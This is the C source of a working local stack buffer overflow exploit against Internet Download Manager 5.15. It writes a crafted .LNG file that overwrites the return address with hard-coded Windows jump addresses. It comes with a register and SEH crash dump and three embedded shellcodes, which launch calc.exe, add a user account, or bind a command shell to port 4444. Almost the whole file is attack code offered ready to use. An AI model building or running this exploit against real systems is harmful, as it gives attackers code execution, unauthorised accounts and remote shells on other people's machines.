|
/*
-----------------------------------
Internet Download Manager 5.15 Local .LNG Stack Buffer Overflow Exploit
cORRuption start at the address in stack of 0x0012E0B4
SEH CHANINS
SEH_1
address_1 0012EE8C -STATUS: clean
SEH_2
address_2 0012FF04 -STATUS: clean
SEH_3
address_3 0012FFB0 -STATUS: clean
EAX 0000002A
ECX 90909090 --controled
EDX 7C90E4F4 ntdll.KiFastSystemCallRet
EBX 0012EEAC
ESP 0012E584 ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
EBP 90909090 --controled
ESI 0012FA6C
EDI 0012E784 ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
EIP 45595945 --controled
CALL STACK --1
call stack Call stack of main thread, item 3
Address=0012EE24 -> Possible return address
Procedure / arguments= pMsg = IDMan.005C70D0
CALL STACK --2
Call stack of main thread, item 8
Address=0012EE60 -> Possible return address
Procedure / arguments=IDMan.00540FAD
Called from=IDMan.0053E281
Stack Dump=00000004 005C71E0 005C7178
Credits for finding the bug go to musashi , credits for programming exploit go to fl0 fl0w.
Tested of Microsoft Windows XP sp3,compiled with Borland C++ 3.1.
-------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
/*tnx Metasploit for Shellcodes*/
//LAUNCH CALC.EXE
char shellcode_1[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
"\x70\x63";
//ADD USER
char shellcode_2[ ]=
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
"\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
"\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
"\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
"\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
"\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
"\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
"\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
"\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
"\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
"\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
"\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
"\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
"\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
"\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
"\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
"\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
"\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
"\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
"\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
"\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
"\x03\x75\x2c\x6f\x80\x8a\xfa\x90";
//REVERSE CMD SHELL ->BIND PORT
char shellcode_3[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
"\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
"\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
"\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
"\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
"\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
"\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
"\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
"\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
"\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
"\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
"\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
"\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
"\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
"\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
"\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
"\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
"\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
"\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
"\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
"\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
"\x03\x75\x2c\x6f\x80\x8a\xfa\x90";
#define SIZE 10000
#define OFFSET 1186
struct {
char *OS;
unsigned int EIP;
}
Retcodes [] = { { "Microsoft Windows Pro sp3 English:", 0x7C8369F0 },/*call esp */
{ "Microsoft Windows Pro sp3 English:", 0x7C86467B }, /*jmp esp */
{ "\t\t\t UNIVERSAL_1:", 0x1008E153 },
{ "\t\t\t UNIVERSAL_2:", 0x219FB9B },
{ "Windows 2000 5.0.1.0 SP1 (IA32) English:", 0x69952208 }, /*jmp esp*/
{ "sss", 0x7C868667} ,
}, t;
char hh[] = {
0x6C, 0x61, 0x6E, 0x67, 0x3D, 0x30, 0x78, 0x31, 0x66, 0x20, 0x54, 0xC3, 0xBC, 0x72, 0x6B, 0xC3,
0xA7, 0x65, 0x0D, 0x0A, 0x32, 0x30, 0x33, 0x37, 0x36, 0x3D, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
};
class EXPLOIT {
public:
void file (char *filename , char *buff);
void write (char *buffer, int shellc_type,char *Y);
void print ();
void usage (char *name);
void target ();
};
int main(int argc, char *argv[])
{
EXPLOIT IDM;
int X, shell ;
char *Z;
char *actbuff;
actbuff = (char *)malloc(SIZE);
if (argc < 3) {
system("cls");
printf("***********************************************************************\n");
IDM.print ();
IDM.usage (argv[0]);
//Sleep(1000);
printf("\n\n");
printf("\t\t\t\tTargets\n");
IDM.target();
printf("************************************************************************\n");
exit (0);
}
Z = argv[1];
shell = atoi(argv[2]);
IDM.write (actbuff, shell, Z);
IDM.file (argv[3], actbuff);
IDM.print();
printf("Loading ...");
//Sleep(3000);
printf ("File build succesfully\n");
return 0;
}
void EXPLOIT::target()
{
int i;
for (i = 0; i < sizeof(Retcodes)/sizeof(t); i++)
printf("> %d %s <0x%.8x> \n", i, Retcodes[i].OS, Retcodes[i].EIP);
}
void EXPLOIT::file (char *filename, char *buff)
{
FILE *f;
if ((f = fopen(filename, "wb")) == NULL) {
printf("Error writing file\n");
exit(0);
}
fwrite (buff, 1 , strlen(buff), f);
free (buff);
fclose (f);
}
void EXPLOIT::write (char *buffer, int shellc_type, char *Y)
{
unsigned int offset = 0;
unsigned int RET = Retcodes[atoi(Y)].EIP;
memset (buffer ,0x90, SIZE);
memcpy (buffer, hh, strlen (hh));
offset = OFFSET;
memcpy (buffer + offset, &RET, 4); offset += 4;
memset (buffer + offset , 0x90, 10); offset +=10;
switch (shellc_type) {
case 1:
memcpy (buffer + offset ,shellcode_1, strlen(shellcode_1)); offset += strlen(shellcode_1);
memset (buffer + offset, 0x00, 1);
break;
case 2:
memcpy (buffer + offset ,shellcode_2, strlen(shellcode_2)); offset += strlen(shellcode_2);
memset (buffer + offset, 0x00, 1);
break;
case 3:
memcpy (buffer + offset ,shellcode_3, strlen(shellcode_3)); offset += strlen(shellcode_3);
memset (buffer + offset, 0x00, 1);
break;
}
}
void EXPLOIT::usage(char *K)
{
printf ("Usage is: %s [target] [shell_type] [filename].html\n", K);
fputs (
"\t\tRetaddress for your version of Windows\n"
"\t\tShell_type is the type of shellcode you want to run\n"
"\t\t\t *Press 1 To Run CALC.EXE\n"
"\t\t\t *Press 2 To Add User\n"
"\t\t\t *Press 3 To Bind Shell to Port 4444\n"
"\t\tExample\n"
"\t\t\tIDM.exe 0 3 file.txt\n"
,stdout);
}
void EXPLOIT::print()
{
fputs(
"\t\tInternet Download Manager 5.15 Local .LNG Stack Buffer Overflow Exploit\n"
"\t\tby fl0 fl0w\n"
"\t\tContact: flo_flow_supremacy@yahoo.com\n"
"\n", stdout);
}
|
推荐
评论(0条)
